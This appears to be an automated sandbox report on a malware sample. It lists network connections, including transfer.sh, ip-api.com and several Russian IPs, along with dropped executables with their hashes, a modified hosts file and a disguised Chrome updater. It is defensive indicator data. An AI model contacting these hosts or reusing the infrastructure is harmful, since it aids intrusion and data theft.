
C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=44251 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3432 --field-trial-handle=1444,i,18067167158138806393,15748960425231055112,131072 --disable-features=PaintHolding /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 226.98.244.136.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 163.1.85.104.in-addr.arpa udp
RU 185.159.129.168:80 tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
RU 185.149.146.118:80 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
RU 77.91.77.144:80 tcp
US 8.8.8.8:53 254.128.241.8.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:44251 tcp
N/A 127.0.0.1:44251 tcp
N/A 127.0.0.1:44251 tcp
N/A 127.0.0.1:44251 tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 100.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp

Files

memory/4476-134-0x00000000024D0000-0x00000000025D0000-memory.dmp

memory/4476-135-0x0000000002460000-0x000000000249F000-memory.dmp

memory/4476-136-0x0000000000400000-0x00000000022FC000-memory.dmp

memory/4476-137-0x0000000004110000-0x0000000004120000-memory.dmp

memory/4476-138-0x0000000004110000-0x0000000004120000-memory.dmp

memory/4476-139-0x0000000004110000-0x0000000004120000-memory.dmp

memory/4476-140-0x0000000006A60000-0x0000000007004000-memory.dmp

memory/4476-141-0x0000000074BA0000-0x0000000075350000-memory.dmp

memory/4476-142-0x00000000071C0000-0x00000000077D8000-memory.dmp

memory/4476-143-0x00000000077E0000-0x00000000078EA000-memory.dmp

memory/4476-145-0x0000000004110000-0x0000000004120000-memory.dmp

memory/4476-144-0x00000000078F0000-0x0000000007902000-memory.dmp

memory/4476-146-0x0000000007910000-0x000000000794C000-memory.dmp

memory/4476-147-0x00000000024D0000-0x00000000025D0000-memory.dmp

memory/4476-148-0x0000000000400000-0x00000000022FC000-memory.dmp

memory/4476-149-0x0000000002460000-0x000000000249F000-memory.dmp

memory/4476-150-0x0000000004110000-0x0000000004120000-memory.dmp

memory/4476-151-0x0000000074BA0000-0x0000000075350000-memory.dmp

memory/4476-152-0x0000000007C00000-0x0000000007C76000-memory.dmp

memory/4476-153-0x0000000007C80000-0x0000000007D12000-memory.dmp

memory/4476-154-0x0000000007D20000-0x0000000007D86000-memory.dmp

memory/4476-155-0x0000000004110000-0x0000000004120000-memory.dmp

memory/4476-156-0x00000000091B0000-0x0000000009200000-memory.dmp

memory/4476-157-0x0000000009540000-0x0000000009702000-memory.dmp

memory/4476-158-0x0000000009710000-0x0000000009C3C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/4748-182-0x00007FF6C6F20000-0x00007FF6C8146000-memory.dmp

memory/4748-184-0x00007FF6C6F20000-0x00007FF6C8146000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/3872-193-0x00000000008F0000-0x0000000000B7B000-memory.dmp

memory/4748-190-0x00007FFEDE9F0000-0x00007FFEDEBE5000-memory.dmp

memory/4748-194-0x00007FF6C6F20000-0x00007FF6C8146000-memory.dmp

memory/4748-195-0x00007FF6C6F20000-0x00007FF6C8146000-memory.dmp

memory/4748-196-0x00007FF6C6F20000-0x00007FF6C8146000-memory.dmp

memory/4748-197-0x00007FF6C6F20000-0x00007FF6C8146000-memory.dmp

memory/4748-198-0x00007FF6C6F20000-0x00007FF6C8146000-memory.dmp

memory/3872-199-0x00000000008F0000-0x0000000000B7B000-memory.dmp

memory/4952-200-0x0000000000400000-0x0000000000527000-memory.dmp

memory/4952-208-0x0000000000400000-0x0000000000527000-memory.dmp

memory/4952-211-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4748-210-0x00007FF6C6F20000-0x00007FF6C8146000-memory.dmp

memory/4952-209-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-212-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-213-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-214-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-217-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-218-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-220-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-221-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-222-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-219-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-216-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-215-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-223-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-225-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-226-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-224-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-227-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-229-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-228-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-230-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-231-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-232-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-234-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-233-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-235-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-236-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-237-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-239-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-238-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-240-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-243-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-241-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-244-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-242-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-245-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-247-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-249-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-246-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-248-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-250-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-251-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-253-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-252-0x00000000FF950000-0x00000000FF960000-memory.dmp

memory/4952-278-0x00000000777F2000-0x00000000777F3000-memory.dmp

memory/3872-282-0x00000000008F0000-0x0000000000B7B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/4528-291-0x00000000009B0000-0x0000000000FE4000-memory.dmp

memory/4748-292-0x00007FFEDE9F0000-0x00007FFEDEBE5000-memory.dmp

memory/4476-328-0x0000000074BA0000-0x0000000075350000-memory.dmp

\??\pipe\crashpad_4220_YPBHZRUYMZTJQNKC

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/4476-347-0x0000000000400000-0x00000000022FC000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZGLV1\Default\DawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZGLV1\Default\DawnCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZGLV1\Default\DawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZGLV1\Default\DawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_teqgw5y4.45b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2020-381-0x0000018DD96C0000-0x0000018DD96E2000-memory.dmp

memory/2020-382-0x00007FFEBEB00000-0x00007FFEBF5C1000-memory.dmp

memory/2020-384-0x0000018DD97A0000-0x0000018DD97B0000-memory.dmp

memory/2020-383-0x0000018DD97A0000-0x0000018DD97B0000-memory.dmp

memory/4528-385-0x00000000009B0000-0x0000000000FE4000-memory.dmp

memory/2020-387-0x0000018DD97A0000-0x0000018DD97B0000-memory.dmp

memory/2020-390-0x00007FFEBEB00000-0x00007FFEBF5C1000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 2d29fd3ae57f422e2b2121141dc82253
SHA1 c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA256 80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512 077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/1004-394-0x00007FFEBEC20000-0x00007FFEBF6E1000-memory.dmp

memory/1004-395-0x000002905D940000-0x000002905D950000-memory.dmp

memory/1004-401-0x000002905D940000-0x000002905D950000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/1004-407-0x000002905D940000-0x000002905D950000-memory.dmp

memory/1004-416-0x000002905D940000-0x000002905D950000-memory.dmp

memory/1004-418-0x00007FFEBEC20000-0x00007FFEBF6E1000-memory.dmp

memory/4748-421-0x00007FF6C6F20000-0x00007FF6C8146000-memory.dmp

memory/4748-422-0x00007FFEDE9F0000-0x00007FFEDEBE5000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 d48d4789fb8347baf4137dcf63bc3c82
SHA1 8759e0fc9ee63b867f85cdaf4171ff0007d592c3
SHA256 0f4e0149ecb81286201691492477a10e9291481d76790cd1c354b72aa02bca7a
SHA512 cc7d05d36f655e0e981cffe9a9976042f50ef261c955729ed472c393c1c9bad6a5546cfa920219279257f29e5635a113ed27f9ffffad9e5c5205d94c797c4058

memory/2728-431-0x00007FF6A0680000-0x00007FF6A18A6000-memory.dmp